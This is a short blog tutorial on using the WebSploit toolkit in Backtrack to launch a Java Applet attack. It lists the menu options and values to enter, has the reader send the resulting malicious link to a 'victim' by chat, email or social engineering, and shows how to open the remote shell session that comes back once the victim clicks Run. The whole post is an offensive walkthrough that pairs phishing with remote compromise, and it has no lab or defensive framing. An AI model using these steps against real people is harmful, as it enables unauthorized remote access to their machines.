First Install Websploit Toolkit in Backtrack

You can view the Tutorial Here

Open Your Backtrack terminal and Type cd  /pentest/web/websploit

Now Open WebSploit Toolkit (SET)  ./websploit

Now choose option 2 “Network Attack Vector”

Now choose option 3 “Java Applet Attack”

wsf: java Applet > Enter Interface Name: eth0

wsf: java Applet > Enter Your IP Address: 192.168.1.2

wsf: java Applet > Enter Main Applet’s Class Name: java

wsf: java Applet > Enter Name of Publisher: java

Now an URL you should give to your victim http://192.168.1.2:8080/index

Send the link of the server to the victim via chat or email or any social engineering technique.

When the victim open that link in their browser, immediately it will alert a dialog box about digital signature cannot be verified like picture below.

If our victim click on the Run button then the exploit will executed and it will return a remote shell to our system. The next two images are proving that the attack was successful.

Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID 

Raj Chandel

Raj Chandel is a Skilled and Passionate IT Professional especially in IT-Hacking Industry. At present other than his name he can also be called as An Ethical Hacker, A Cyber Security Expert, A Penetration Tester. With years of quality Experience in IT and software industry.His interests are mainly in system exploitation and vulnerability research. Contact me: [email protected]

More Posts

Follow Me:
TwitterFacebookGoogle Plus